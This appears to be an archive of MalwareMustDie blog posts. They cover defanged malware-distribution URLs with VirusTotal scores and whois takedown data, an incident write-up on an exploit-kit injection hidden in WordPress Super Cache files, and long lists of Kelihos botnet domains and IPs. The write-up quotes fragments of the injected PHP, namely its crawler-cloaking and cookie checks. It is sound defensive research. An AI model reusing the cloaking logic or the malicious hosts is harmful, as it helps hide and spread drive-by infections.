2013-07-24 19:33:18 h00p://nphssoccercards.com/topic/regard_alternate_sheet.php?If=2d2i2g302g&Se=302g572f53 (...) [United States] 162.216.18.169
2013-07-24 18:56:07 h00p://nphssoccercards.com/topic/regard_alternate_sheet.php?iKoOp=572h322i55&wQrxKfxXfP (...) [United States] 162.216.18.169
2013-07-24 18:53:14 h00p://nphssoccercards.com [United States] 162.216.18.169
2013-07-24 18:25:56 h00p://nphssoccercards.com/topic/regard_alternate_sheet.php [United States] 162.216.18.169
2013-07-24 18:13:21 h00p://nphssoccercards.com/topic/regard_alternate_sheet.php [United States] 162.216.18.169
2013-07-24 17:53:12 h00p://nphssoccercards.com/topic/regard_alternate_sheet.php [United States] 162.216.18.169
2013-07-24 17:17:24 h00p://nphscards.com/topic/accidentally-results-stay.php [United States] 162.216.18.169
2013-07-24 16:40:13 h00p://nphscards.com/topic/accidentally-results-stay.php [United States] 162.216.18.169
2013-07-24 16:29:31 h00p://nphscards.com/topic/accidentally-results-stay.php [United States] 162.216.18.169
2013-07-24 13:18:30 h00p://nphscards.com/topic/accidentally-results-stay.php [United States] 162.216.18.169
2013-07-24 12:29:44 h00p://nphscards.com/topic/accidentally-results-stay.php [United States] 162.216.18.169
And also can be seen in Virus Total URL check here-->>[CLICK], pasted below as: 
5/39 2013-07-25 09:17:49 h00p://nphssoccercards.com/topic/regard_alternate_sheet.php?ilhtELOHdpisFWs=YgItFHLgkO&JJfLXzq...
3/39 2013-07-25 07:05:13 h00p://2013vistakonpresidentsclub.com/topic/religiouss-selected.php
8/39 2013-07-25 06:05:45 h00p://nphssoccercards.com/adobe/update_flash_player.exe
4/39 2013-07-25 04:58:59 h00p://nphscards.com/topic/accidentally-results-stay.php?ceJfcWErQTbG=kCwAByXBRdETOJ&tsDWPg=Rp...
4/39 2013-07-25 04:58:59 h00p://nphscards.com/topic/accidentally-results-stay.php?Ff=5656562e2i&Ce=2d2i562g552g2f572i54...
4/39 2013-07-25 04:58:59 h00p://nphscards.com/topic/accidentally-results-stay.php?jf=32542d2e2d&Be=2d2i562g552g2f572i54...
4/39 2013-07-25 04:58:59 h00p://nphscards.com/topic/accidentally-results-stay.php?TbcoUkQBgX=hGSiu&qhiHoQj=JBEYjg
4/39 2013-07-25 04:58:59 h00p://nphscards.com/topic/accidentally-results-stay.php?ff=2g3131542j&ke=302g572f5352572i572f...
3/39 2013-07-25 04:01:30 h00p://nphscards.com/topic/accidentally-results-stay.php%27%3B
3/39 2013-07-25 03:49:25 h00p://2013vistakonpresidentsclub.com/topic/operation_statistic_objects.php
5/39 2013-07-25 01:22:26 h00p://nphssoccercards.com/topic/regard_alternate_sheet.php?If=2e542f5452&ae=302g572f5352572i5...
5/39 2013-07-25 01:21:06 h00p://nphssoccercards.com/contacts.exe
5/38 2013-07-24 23:07:28 h00p://nphssoccercards.com/ubi/template/identity/lib/style-nurse.htc
8/38 2013-07-24 21:40:20 h00p://nphscards.com/adobe/update_flash_player.exe
7/39 2013-07-24 21:19:11 h00p://2013vistakonpresidentsclub.com/topic/regard_alternate_sheet.php
2/38 2013-07-24 21:03:03 h00p://2013vistakonpresidentsclub.com/
4/39 2013-07-24 18:58:16 h00p://nphscards.com/topic/accidentally-results-stay.php
4/39 2013-07-24 18:16:45 h00p://nphssoccercards.com/topic/regard_alternate_sheet.php?Rf=322e2i542f&fe=302g572f5352572i5...
4/39 2013-07-24 18:16:45 h00p://nphssoccercards.com/topic/regard_alternate_sheet.php?Kf=322e2i542f&xe=522e552d57552f305...
4/39 2013-07-24 18:16:45 h00p://nphssoccercards.com/topic/regard_alternate_sheet.php?If=2d2i2g302g&Se=302g572f53525...
4/39 2013-07-24 18:16:45 h00p://nphssoccercards.com/topic/regard_alternate_sheet.php?KYdttLYSrKSgb=BcaETwRFtxefjW&UAoFL...
4/39 2013-07-24 18:05:46 h00p://nphssoccercards.com/topic/regard_alternate_sheet.php?iKoOp=572h322i55&wQrxKfxXfPToik=52...
3/39 2013-07-24 17:20:55 h00p://nphssoccercards.com/adobe/adobe_files/mhtB264%281%29.tmp
2/39 2013-07-24 17:18:51 h00p://nphssoccercards.com/topic/regard_alternate_sheet.php
2/39 2013-07-24 17:16:40 h00p://nphssoccercards.com/
2/39 2013-07-24 17:00:10 h00p://nphssoccercards.com/adobe/
2/39 2013-07-24 16:58:25 h00p://nphssoccercards.com/topic/regard_alternate_sheet.php?iKoOp=572h322i55&wQrxKfxXfPToi...
2/39 2013-07-24 16:53:57 h00p://nphscards.com/
4/38 2013-07-24 16:18:14 h00p://nphscards.com/topic/accidentally-results-stay.php?mf=542h2i312h&Me=302g572f5352572i572f...
2/39 2013-07-24 15:18:08 h00p://nphssoccercards.com/forum/viewtopic.php
2/38 2013-07-24 15:07:48 h00p://nphssoccercards.com/topic/religiouss-selected.php
4/38 2013-07-23 23:10:24 h00p://nphscards.com/adobe

Domain and IP Network information:

The below is the information of registrar and ISP that provides the IP for this infector: 

// Domains & IP registration (for shutddown purpose)
// Is GoDaddy Domain in Linode network

  Domain Name: NPHSCARDS.COM
  Registrar: GODADDY.COM, LLC
  Whois Server: whois.godaddy.com
  Referral URL: http://registrar.godaddy.com
  Name Server: NS29.DOMAINCONTROL.COM
  Name Server: NS30.DOMAINCONTROL.COM
  Status: clientDeleteProhibited
  Status: clientRenewProhibited
  Status: clientTransferProhibited
  Status: clientUpdateProhibited
  Updated Date: 05-oct-2012
  Creation Date: 10-oct-2010
  Expiration Date: 10-oct-2013

NetRange:       162.216.16.0 - 162.216.19.255
CIDR:           162.216.16.0/22
OriginAS:
NetName:        LINODE-US
NetHandle:      NET-162-216-16-0-1
Parent:         NET-162-0-0-0-0
NetType:        Direct Allocation
RegDate:        2013-06-19
Updated:        2013-06-19
Ref:            http://whois.arin.net/rest/net/NET-162-216-16-0-1

OrgName:        Linode
OrgId:          LINOD
Address:        329 E. Jimmie Leeds Road
Address:        Suite A
City:           Galloway
StateProv:      NJ
PostalCode:     08205
Country:        US
RegDate:        2008-04-24
Updated:        2010-08-31
Comment:        http://www.linode.com
Ref:            http://whois.arin.net/rest/org/LINODE
Yes, we need GoDaddy cooperation to dismantle this domain to prevent further infection and Linote cooperration to clean up the host.

If you interested in investigation log, you can fetch it here-->>[Download]

#MalwareMustDie!

"You hacked.. We cracked & You're doomed!" - An IR adventure of an abused "WP Super Cache" plugin for Exploit Kit (Glazunov) infection

August 1, 2013, 8:31 am
$
0
0
"I dedicated this post to our members on visit to BlackHat & Def Con 2013, who's helping to present our group in the security community, with deeply regret that I could not make it to go there, no matter how bad I would like to.
Thank you to @hugbomb, @set_abimone and @kafeine for the help in the spotting redirection, EK confirmation and flushing samples, to @hFireF0X and other Kernel Mode members for helping figuring & quick mitigating the new version of Zero Access spotted in this threat!"

Background

I was mentioned about an infection by our team's @hugbomb: I cleaned the site within 24hrs, after releasing my neck of the woods.. :-)
I made domestic report in here -->>[0day.jp], and this is the post about how the malicious redirection was made.

The nature of the infection is, only IE browser with java plugin access is affected, a non direct access. Some parts of the a kind of ACL used in this redirector us still on decoding process, so maybe we can report more feature they use upon 100% finished. If you meet the accepted condition, you will be redirected to Glazukov Exploit Kit to infect you with Zero Access/Sireref malware. I had hard time in confirming this site, so I had to ask many friends to confirm the case and its condition by some tests. The good thing is the site's admin is very supportive and asked me to make investigation properly and allowing this post to be publicly published to prevent more infection.

First, we have to be sure WHICH CODES and WHERE had been injected:

Is that it?? Nope.. The diff result shows more, during the injection session, the header was added with these stuff too:

1,9d0
< HTTP/1.1 200 OK
< Date: Mon, 29 Jul 2013 10:24:55 GMT
< Server: Apache
< X-Pingback: h00p://VICTIM.SITE/xmlrpc.php
< "Set-Cookie: stats=446501053769c06c565094b26d26e8ef; 
               expires=Mon, 29-Jul-2013 13:24:56 GMT"
< Connection: close
< Content-Type: text/html; charset=UTF-8
< Content-Length: 61451
↑Noted this: the header was added with the setting of cookie with stats variable and an expiry date which doesn't exist during the normal mode.
OK, let's move on and see carefully how the breakdown of the injected code goes:

Explanation:

We see the javascript tagged codes, usage of specific cookie, user will be firstly forced to call the landing page of Glazunov Exploit Kit at upper URL, then the checking interface of browser components using PluginDetect (noted: version 0.8.1) will be performed, the condition in Java Exploitation will depend on detected Java version.

If the Java version is ver 7 the JNLP base infection via "buj58i7kc3.jnlp" will be perform, or else the direct Jar class "weptblklaadp.nfpmuqaplgapmsrrmnranye.class" of "8.zip" a CVE-2013-1493 JAR Exploit. In my previous report here -->>[kernelmode.info] I know the payload is a new type of ZeroAccess/ MaxPlus / Sireref payload trojan.

Pictures of the infector components and CVE method used in the Jar(ZIP) infector

Spotting the infection source

So how this code can be injected? This is the point of this post.
Please see the picture above in the marked red below part. It stated: 

<!-- WP Super Cache is installed but broken. 
The path to wp-cache-phase1.php 
in wp-content/advanced-cache.php must be fixed! -->
Confirming this to the site owner and found that error wasn't suppose to be happened.

I executed the first stage on checks by run into .htaccess, php.ini, default.php etc, wasn't finding anything suspicious, and went deeper to find the apache module is in place, so does the web server daemon used.
Went back to .htaccess and found myself staring into this line : 

RewriteCond %{DOCUMENT_ROOT}/wp-content/cache/supercache/%{SERVER_NAME}/$1/index.html -f
RewriteRule ^(.*) "/wp-content/cache/supercache/%{SERVER_NAME}/$1/index.html" [L]

OK, this is the Wordpress Super Cache plugin is running, intrigued by the error caused by the same plugin made me dive into the plugin directories: 

  :
2013/07/23  00:00     514 advanced-cache.php
2013/07/23  00:00   1,259 wp-cache-base.php
2013/07/23  00:00   2,988 wp-cache-config-sample.php
2013/07/23  00:00  25,524 wp-cache-phase1.php
2013/07/23  00:00  60,553 wp-cache-phase2.php
2013/07/23  00:00 180,031 wp-cache.php
2013/07/23  00:00  52,772 wp-super-cache.pot
  :
This is just perfectly strange, since everything was installed on 2012/07/23 at exactly midnight :-)) lame..
Just to be sure I made detail comparison to the original plugin:
To find the size changes, but no differences in codes after I "diff"-ed them.. weird.. Making me think the attacker was storing stuff to normal after injection stored?

Let's see what we got now, WP cache plugin error, strange plugin files dates, and an injected code.

Went back to the injected code, found that the obfuscation built by Zend, and using this as grep "significant" character to find the list of the injection code's file sources:

Noted: the yellow color is the files and their path, all of them was injected in the first lines, and the green color is the similarity found in Zend framework builder used.

below is the list of these injectors: 

wp-content\advanced-cache.php
wp-content\wp-cache-config.php
victim.site\wp-content\advanced-cache.php
victim.site\wp-content\wp-cache-config.php
And now we know why the error in the top page occured! :-)

The attacker also injected codes in the current WordPress Theme used by the victim, again I pasted the "atahualpa" theme files injected by the malware code: 

victim.site\wp-content\themes\atahualpa\comments-paged.php
victim.site\wp-content\themes\atahualpa\comments.php
victim.site\wp-content\themes\atahualpa\footer.php
victim.site\wp-content\themes\atahualpa\functions.php
victim.site\wp-content\themes\atahualpa\index.php
victim.site\wp-content\themes\atahualpa\legacy.comments.php
victim.site\wp-content\themes\atahualpa\searchform.php
Seeing closely into each file we can guess WHEN the attacker was replacing these files:

Understanding how the malicious code works..

Well, the code used to inject pages is as per pasted "safe" code here-->>[PASTEBIN]
The first level of obfuscation process extracted from the code is-->>[PASTEBIN]
With noted(AGAIN): The code is only for view and can't be executed, a.k.a. I "hexed" the codes.

Following the decoded one, in the below line number you'll see this codes:

It shows the regex operation to grab and replace the original contents, and insert the injection code after assembled with the tags <BODY and </HTML (marked in purple color), to be noted all of these are possible by the abuse of Wordpress plugin mentioned.

I tried to manually further decode to find two similar pattern obfuscation blocks, each block contains these parts with the below logic:

Obfuscation block...

Decoder..

Parser of the decoded codes..

Well the above codes are a rough copy-paste of my notepads, all you have to do next is grab the blob of data, modified a bit as per those moronz wanted, decode it using the logic seen in the decoder parts, and parse it out.

I tried to follow the flow of codes manually, use only one text editor, but it looks like things went off the rails somewhere.. So it looks like I get stuck in the final decode status here -->>[PASTEBIN]

During to the decoding the blob manually, some of the interesting result shown:

Exclusion of the user agents...

$user_agents = array ("Google",
                      "Slurp",
                      "MSNBot",
                      "ia_archiver",
                      "Yandex",
                      "Rambler
Passing ot the user-agent to the Exploit Kit url...
if((preg_match("/".
   implode("|", $user_agents)."/i", 
      $_SEVER['HTTP_USER_AGENT'])) or
         ( isset($_COOKIE['stats'])))
At this point I realize that more effort in de-obfuscation will take more time and energy (I have to do it from beginning all over again), which I don't have thise right now, not in the weekdays. So I reproduced the injection source script in the PHP with WP server test environment to get the injection code as per pasted here, bit by bit in text -->>[PASTEBIN]
Noted that the path of the exploit kit and the name of zip/Jar file name has changed. The code is hexed also.

I look further to finish decoding this weekend, hope this writing helps people who got hit by the same threat. Be free to ask me question via comment part of this post.

Additional:

Our members found the trace of similar obfuscation, assumed the previous attacks. So is in the wild..

Moral of the Story

This threat is harmful, as harmful and nasty as a Rogue Apache modules or a Rogue Web Server; Wordpress Super Cache is providing every tools to make the redirection, to control the access, to grab HTTP request and change & parse it into a malicious one in a snap.. And better yet, is easy to be implemented by hacker.. I mean, all they do is making sure you have the old version of WP Super Cache (which can be found out by remote/HTTP checks), brute (or buy) your (stolen) FTP account (somehow) and things like I posted here will happen. The attacker doesn't even need to hack your Apache module, and no need to have root permission to replace the web server related system, thus not leaving many traces (i.e. no .htaccess, no ptp.ini , no default.php, no strange conf to touch..), and a successfully attacker can camouflage their codes like putting a needle in a haystack. And with noted, this is a real IR case friend.. a PoC to what we should aware more of this threat.

I hope all of the WP users to aware of the security risk on using useful plugins they use, as much as they aware its usefulness. Stay update your versions of CMS and its plugins, change your FTP server password regularly (I don't say oftenly) and your risk to have a hacked server like this will be minimized.

Stay safe friends!

#MalwareMustDie!!

The result on 48hours+ in battle with Kelihos < request for FURTHER block/dismantle cooperation & support. #Tango is going down..

August 8, 2013, 4:10 am
$
0
0
This post is dedicated to many.. so many of wonderful individuals involved with the effort to stand against Kelihos P2P malware infection. This is an example on WHAT CAN BE DONE if InfoSec are gathered to fight malware infection. This report is totally an effort of a team contains members who simply believe the same dream, to free our internet from malware. We cannot make a list of your (so many) names but we are all know who you are and what you did. Sincerely respect with thank you very much. There were many bumpy communication was initially made, for the tense and rogue communication we apology to every inconveniences. I personally am so happy to live in an era of gentlemen like you are! #MalwareMustDie!

As per you maybe noticed in the our twitter timeline, we are doing our best effort in battle with the Kelihos malware scum, yes we were haunted by this infection via RedKit Exploit Kits, TDSS, direct spam or via its botnet self-updating function itself and this "scum" still out there and feeling happy-ever-after infecting us, we just can not accept this fact.

Therefore we executed every possible effort that can be done as a bunch of volunteers of an NPO entity to suppress their growth in internet. As the efforts itself is varied from suspension, sinkhole, DNSBL block, VT/URLQuery (+etc) blacklisting, OpenDNS/GoogleDNS blocking, parallel with bunch of reports to the regional basis authorities (CERTs, GroupIB, ISPs, Registrar, ICANN, Microsoft) and to varied Sinkhole entities.

We recieved the great help and support from the people in the entities mentioned above, and also with a perfect work delegation between our team in twitter so we are able to gain a good fight and successfully resulted some good achivements within 48hours+. It is unfair to let people who help and support us by seeing only twitter as result that's why I posted our effort's report here, together with some tips and tricks used in fighting this infection in our beloved MalwareMustDie blog.

And this post is the report of the mentioned effort. Here we go..

1. Stopping the new Kelihos NS based .COM services

By the time we started this effort, Kelihos started to switch their DNS from something with ns[1-6]."\][a-z]\{7\,8\}\.".RU into the .COM tld domains with the format ns[1-6]."\][a-z]\{7\}\.".COM , we found that all of the domains was released by INTERNET.BS a well-known registrar of being abused by the cybercrime to release their infector domains. And with the great help from the very dedicated individuals mentioned above we took these domains (see below) off internet: 

DUSSEVA.COM
BEUHNIM.COM
GULFKAT.COM
ZUNCHER.COM
FLOWSRE.COM
OMBUGEW.COM
WIDERAT.COM
DAVUJUZ.COM
XEXUMYB.COM
KAROZGI.COM
OSIKKID.COM
NIGUCGU.COM
below is the PoC of the suspension and sinkholing result:

This is how they got into internet:

The following is some of PoC and hard evidence of the .COM that Kelihos used are in the extracted INTERNET.BS released domains database-->>[PASTEBIN]

2. The dismantling effort of .RU infectors

Currently, the main basis of the Kelihos infecion are using the .RU basis ccTLD domain. It is very important to suppress their growth in their home-base also. With the great coordination and help fro GroupIB we made effort to dismantle the other "NEW" 101 .RU "weaponized domains as per listed below: 

Date: Thu Aug  8 19:54:43 JST 2013

ABJIQFIR.RU,, ns[1-6].karozgi.com
ACXYPZUK.RU,, ns[1-6].karozgi.com
AFEBIRYN.RU,, ns[1-6].karozgi.com
ANGENJEJ.RU,, ns[1-6].karozgi.com
BADMYVOK.RU,, ns[1-6].karozgi.com
BEZGESUK.RU,, ns[1-6].karozgi.com
BITITROJ.RU,, ns[1-6].karozgi.com
BOVEWHAV.RU,, ns[1-6].karozgi.com
BOWRETTI.RU,, ns[1-6].karozgi.com
CICDIWYH.RU,, ns[1-6].karozgi.com
COLYDQEC.RU,, ns[1-6].karozgi.com
CYVWYDJE.RU,, ns[1-6].karozgi.com
DAHADKYZ.RU,, ns[1-6].karozgi.com
DEPCOPUQ.RU,, ns[1-6].karozgi.com
DEQYPPIL.RU,, ns[1-6].karozgi.com
DIICUHXA.RU,, ns[1-6].karozgi.com
EJOPOWOZ.RU,, ns[1-6].karozgi.com
EJQIURMY.RU,, ns[1-6].karozgi.com
FITUZVOF.RU,, ns[1-6].karozgi.com
FOJEGGUF.RU,, ns[1-6].karozgi.com
GAJKUKUC.RU,, ns[1-6].karozgi.com
GECAKCEM.RU,, ns[1-6].karozgi.com
GYCBOKUD.RU,, ns[1-6].karozgi.com
HURVINEV.RU,, ns[1-6].karozgi.com
HUZNEJEX.RU,, ns[1-6].karozgi.com
HYNEQREL.RU,, ns[1-6].karozgi.com
IMKYHTUG.RU,, ns[1-6].karozgi.com
IPXYJYOQ.RU,, ns[1-6].karozgi.com
ITWILMEP.RU,, ns[1-6].karozgi.com
IWKYXSEZ.RU,, ns[1-6].karozgi.com
IXMUTIRI.RU,, ns[1-6].karozgi.com
JAHKUXYV.RU,, ns[1-6].karozgi.com
JEFDYWSO.RU,, ns[1-6].karozgi.com
JIQLIDOX.RU,, ns[1-6].karozgi.com
JOKLASAN.RU,, ns[1-6].karozgi.com
KAPKICOH.RU,, ns[1-6].karozgi.com
KEBWAKQY.RU,, ns[1-6].karozgi.com
KICSIHOP.RU,, ns[1-6].karozgi.com
KIZCIVZE.RU,, ns[1-6].karozgi.com
KUBGYBOH.RU,, ns[1-6].karozgi.com
KYCROTUS.RU,, ns[1-6].karozgi.com
LICLAJLE.RU,, ns[1-6].karozgi.com
LIMJOZEH.RU,, ns[1-6].karozgi.com
LIZECGIJ.RU,, ns[1-6].karozgi.com
LUFRUDET.RU,, ns[1-6].karozgi.com
LUPQUXSE.RU,, ns[1-6].karozgi.com
LYOHGEOF.RU,, ns[1-6].karozgi.com
MAPUHXAF.RU,, ns[1-6].karozgi.com
MOHGOXEB.RU,, ns[1-6].karozgi.com
MYBFABWI.RU,, ns[1-6].karozgi.com
NECUWFEW.RU,, ns[1-6].karozgi.com
NENKUDYF.RU,, ns[1-6].karozgi.com
NICLYCOM.RU,, ns[1-6].karozgi.com
NOJQAVYJ.RU,, ns[1-6].karozgi.com
NORWOLLU.RU,, ns[1-6].karozgi.com
NUKUNNOQ.RU,, ns[1-6].karozgi.com
ONSUGNEM.RU,, ns[1-6].karozgi.com
ORNEVKYC.RU,, ns[1-6].karozgi.com
PEXDAJYP.RU,, ns[1-6].karozgi.com
PIVGEVIT.RU,, ns[1-6].karozgi.com
PIYMNYFA.RU,, ns[1-6].karozgi.com
POWERWIK.RU,, ns[1-6].karozgi.com
PUPUXHEF.RU,, ns[1-6].karozgi.com
PYDAJZYK.RU,, ns[1-6].karozgi.com
QABADPIX.RU,, ns[1-6].karozgi.com
QOFHIRAW.RU,, ns[1-6].karozgi.com
QYSQUWKO.RU,, ns[1-6].karozgi.com
RIFAUTIR.RU,, ns[1-6].karozgi.com
RIZIKCUG.RU,, ns[1-6].karozgi.com
ROVSYMWO.RU,, ns[1-6].karozgi.com
RYTEOPBY.RU,, ns[1-6].karozgi.com
SAWSOBCY.RU,, ns[1-6].karozgi.com
SOMOXBET.RU,, ns[1-6].karozgi.com
TAFIBCUM.RU,, ns[1-6].karozgi.com
TAZGYVAX.RU,, ns[1-6].karozgi.com
TITGOQTE.RU,, ns[1-6].karozgi.com
TYZFOWFE.RU,, ns[1-6].karozgi.com
UWPAYTNU.RU,, ns[1-6].karozgi.com
VEFLOHGY.RU,, ns[1-6].karozgi.com
VEKDEGYL.RU,, ns[1-6].karozgi.com
VUZNIQIK.RU,, ns[1-6].karozgi.com
VYFUXTIS.RU,, ns[1-6].karozgi.com
WANZAWBY.RU,, ns[1-6].karozgi.com
WODYFWOD.RU,, ns[1-6].karozgi.com
WORLIPXO.RU,, ns[1-6].karozgi.com
XAKRYXOG.RU,, ns[1-6].karozgi.com
XIMIRSEX.RU,, ns[1-6].karozgi.com
XIMXAMLI.RU,, ns[1-6].karozgi.com
XUGNEMYQ.RU,, ns[1-6].karozgi.com
YFKYTXIX.RU,, ns[1-6].karozgi.com
YFXIGUSO.RU,, ns[1-6].karozgi.com
YGXEYVXI.RU,, ns[1-6].karozgi.com
YJSEYGFY.RU,, ns[1-6].karozgi.com
YWHYIWDY.RU,, ns[1-6].karozgi.com
ZADNAZVO.RU,, ns[1-6].karozgi.com
ZUNCUHAK.RU,, ns[1-6].karozgi.com
ZUVNENAX.RU,, ns[1-6].karozgi.com
ZUZVAQAW.RU,, ns[1-6].karozgi.com
ZYHIJWIN.RU,, ns[1-6].karozgi.com
ZYRTYDAJ.RU,, ns[1-6].karozgi.com
From the status of weaponized by Kelihos to infect as per recorded HLUX's A records in here: 
Date: Fri, 2 Aug 2013 11:43:40 -0700 (PDT)

ABJIQFIR.RU,188.209.251.38,
ACXYPZUK.RU,109.89.137.178,
AFEBIRYN.RU,,
ANGENJEJ.RU,,
BADMYVOK.RU,77.122.196.95,
BEZGESUK.RU,77.122.139.203,
BITITROJ.RU,109.191.82.32,
BOVEWHAV.RU,93.79.91.188,
BOWRETTI.RU,,
CICDIWYH.RU,89.229.196.228,
COLYDQEC.RU,46.56.67.7,
CYVWYDJE.RU,190.220.70.5,
DAHADKYZ.RU,178.75.46.67,
DEPCOPUQ.RU,89.149.105.201,
DEQYPPIL.RU,109.87.198.110,
DIICUHXA.RU,95.111.205.207,
EJOPOWOZ.RU,79.112.214.164,
EJQIURMY.RU,188.129.240.79,
FITUZVOF.RU,37.229.99.95,
FOJEGGUF.RU,,
GAJKUKUC.RU,176.37.121.102,
GECAKCEM.RU,77.122.191.111,
GYCBOKUD.RU,176.8.231.155,
HURVINEV.RU,46.237.110.5,
HUZNEJEX.RU,95.65.80.117,
HYNEQREL.RU,94.76.110.237,
IMKYHTUG.RU,37.252.67.195,
IPXYJYOQ.RU,93.79.231.55,
ITWILMEP.RU,,
IWKYXSEZ.RU,178.218.66.19,
IXMUTIRI.RU,109.207.113.126,
JAHKUXYV.RU,46.185.24.210,
JEFDYWSO.RU,93.125.45.196,
JIQLIDOX.RU,109.201.107.204,
JOKLASAN.RU,88.206.28.89,
KAPKICOH.RU,109.207.118.98,
KEBWAKQY.RU,109.251.94.117,
KICSIHOP.RU,77.120.229.169,
KIZCIVZE.RU,86.101.22.28,
KUBGYBOH.RU,77.122.217.253,
KYCROTUS.RU,94.253.45.147,
LICLAJLE.RU,46.33.55.77,
LIMJOZEH.RU,93.126.126.71,
LIZECGIJ.RU,,
LUFRUDET.RU,159.224.76.42,
LUPQUXSE.RU,37.115.91.192,
LYOHGEOF.RU,109.87.162.4,
MAPUHXAF.RU,37.46.226.241,
MOHGOXEB.RU,194.28.4.29,
MYBFABWI.RU,27.49.104.107,
NECUWFEW.RU,94.231.181.24,
NENKUDYF.RU,178.165.23.171,
NICLYCOM.RU,,
NOJQAVYJ.RU,98.193.167.182,
NORWOLLU.RU,178.137.203.149,
NUKUNNOQ.RU,24.49.38.150,
ONSUGNEM.RU,77.85.201.46,
ORNEVKYC.RU,219.70.195.200,
PEXDAJYP.RU,31.128.186.43,
PIVGEVIT.RU,,
PIYMNYFA.RU,46.173.112.16,
POWERWIK.RU,94.244.129.195,
PUPUXHEF.RU,176.8.38.115,
PYDAJZYK.RU,2.68.213.50,
QABADPIX.RU,46.211.63.25,
QOFHIRAW.RU,176.37.121.102,
QYSQUWKO.RU,178.137.72.42,
RIFAUTIR.RU,213.111.69.126,
RIZIKCUG.RU,,
ROVSYMWO.RU,,
RYTEOPBY.RU,89.146.79.57,
SAWSOBCY.RU,,
SOMOXBET.RU,121.129.93.208,
TAFIBCUM.RU,109.87.7.53,
TAZGYVAX.RU,180.110.156.205,
TITGOQTE.RU,189.199.182.2,
TYZFOWFE.RU,,
UWPAYTNU.RU,77.122.227.41,
VEFLOHGY.RU,,
VEKDEGYL.RU,46.173.77.173,
VUZNIQIK.RU,94.230.192.50,
VYFUXTIS.RU,151.0.27.230,
WANZAWBY.RU,212.142.96.18,
WODYFWOD.RU,77.85.201.46,
WORLIPXO.RU,77.121.79.14,
XAKRYXOG.RU,118.160.103.152,
XIMIRSEX.RU,220.137.79.242,
XIMXAMLI.RU,195.24.155.245,
XUGNEMYQ.RU,77.120.179.237,
YFKYTXIX.RU,46.211.85
YFXIGUSO.RU,195.24.155.245,
YGXEYVXI.RU,178.211.139.155,
YJSEYGFY.RU,,
YWHYIWDY.RU,123.236.68.229,
ZADNAZVO.RU,27.6.9.213,
ZUNCUHAK.RU,,
ZUVNENAX.RU,119.14.86.100,
ZUZVAQAW.RU,123.241.73.225,
ZYHIJWIN.RU,178.151.24.58,
ZYRTYDAJ.RU,31.42.119.142,
And currently in blocking effort with OpenDNS & sinkhole the below RU domains: 
EJWOPWYZ.RU,188.27.168.54, ns[1-6].osikkid.com
EKREDTEF.RU,, ns[1-6].osikkid.com
EQGYQTAD.RU,46.250.23.59, ns[1-6].osikkid.com
EVLYLTUX.RU,94.154.224.58, ns[1-6].osikkid.com
FIBLOQAF.RU,, ns[1-6].osikkid.com
FINQIMIG.RU,, ns[1-6].osikkid.com
FOHKYQUW.RU,92.113.255.98, ns[1-6].osikkid.com
FOWAJKUG.RU,, ns[1-6].osikkid.com
FYBYNKEQ.RU,, ns[1-6].osikkid.com
FYDIWGAZ.RU,, ns[1-6].osikkid.com
FYGJUGLI.RU,180.176.172.93, ns[1-6].osikkid.com
FYJTIHOX.RU,, ns[1-6].osikkid.com
FYTUCTOX.RU,, ns[1-6].osikkid.com
GEGDYRAG.RU,, ns[1-6].osikkid.com
GEGMULAD.RU,36.229.82.210, ns[1-6].osikkid.com
GENUVBIZ.RU,, ns[1-6].osikkid.com
GIZROSCA.RU,, ns[1-6].osikkid.com
GUQIDRUV.RU,91.224.168.65, ns[1-6].osikkid.com
HAMOVLOX.RU,, ns[1-6].osikkid.com
HAZLYDUW.RU,85.198.179.73, ns[1-6].osikkid.com
HIHFELGO.RU,, ns[1-6].osikkid.com
HIILOSAB.RU,111.251.91.74, ns[1-6].osikkid.com
HIKKINUF.RU,, ns[1-6].osikkid.com
HOKKINYF.RU,62.231.183.49, ns[1-6].osikkid.com
IVKEUHUW.RU,178.150.244.54, ns[1-6].osikkid.com
IXCUPDAM.RU,124.123.169.123, ns[1-6].osikkid.com
JIBDEFUP.RU,, ns[1-6].osikkid.com
JIXUDRER.RU,, ns[1-6].osikkid.com
JUQUTSAF.RU,112.139.167.48, ns[1-6].osikkid.com
JURLYQYR.RU,129.15.40.86, ns[1-6].osikkid.com
JUVBEBEC.RU,, ns[1-6].osikkid.com
JYHVYCLI.RU,, ns[1-6].osikkid.com
JYSHIWIK.RU,, ns[1-6].osikkid.com
KANRUQYC.RU,, ns[1-6].osikkid.com
KEJIKKIB.RU,77.52.104.119, ns[1-6].osikkid.com
LAWNUPAS.RU,, ns[1-6].osikkid.com
LENEVRYP.RU,, ns[1-6].osikkid.com
LIFNAGCI.RU,, ns[1-6].osikkid.com
LILXAJTE.RU,, ns[1-6].osikkid.com
MEDULZAL.RU,, ns[1-6].osikkid.com
MOJJIQUF.RU,, ns[1-6].osikkid.com
MUBYBLAZ.RU,, ns[1-6].osikkid.com
NADKEWLO.RU,, ns[1-6].osikkid.com
NEQAJDAC.RU,, ns[1-6].osikkid.com
NUJOJPAL.RU,, ns[1-6].osikkid.com
PABOBBAH.RU,, ns[1-6].osikkid.com
PELVOJEL.RU,, ns[1-6].osikkid.com
PEQINNIR.RU,, ns[1-6].osikkid.com
PIGOVFIJ.RU,, ns[1-6].osikkid.com
PYMSILIQ.RU,, ns[1-6].osikkid.com
QAQIQGOD.RU,, ns[1-6].osikkid.com
QEGYRDAD.RU,, ns[1-6].osikkid.com
QEHWOCSI.RU,115.241.91.53, ns[1-6].osikkid.com
RALYMEBU.RU,77.198.70.248, ns[1-6].osikkid.com
RAWPENEP.RU,114.38.44.145, ns[1-6].osikkid.com
RAZCAMIT.RU,37.112.160.119, ns[1-6].osikkid.com
RETUCWYX.RU,, ns[1-6].osikkid.com
RIHSYCVO.RU,213.111.155.5, ns[1-6].osikkid.com
RIZOMCOF.RU,178.74.237.85, ns[1-6].osikkid.com
RYCNISAV.RU,, ns[1-6].osikkid.com
RYGXUQYF.RU,, ns[1-6].osikkid.com
SECZYPRY.RU,46.162.9.40, ns[1-6].osikkid.com
SEPOILOK.RU,, ns[1-6].osikkid.com
SIPVAQBE.RU,188.242.51.78, ns[1-6].osikkid.com
SOKXENBY.RU,37.221.142.107, ns[1-6].osikkid.com
TERUJBIH.RU,, ns[1-6].osikkid.com
TYVWUQAL.RU,, ns[1-6].osikkid.com
UDPYCBEL.RU,, ns[1-6].osikkid.com
UHHUWTEG.RU,, ns[1-6].osikkid.com
UJDOGVIC.RU,, ns[1-6].osikkid.com
UQEBENEW.RU,, ns[1-6].osikkid.com
VESYKVEL.RU,193.107.102.209, ns[1-6].osikkid.com
VUVSIMXO.RU,, ns[1-6].osikkid.com
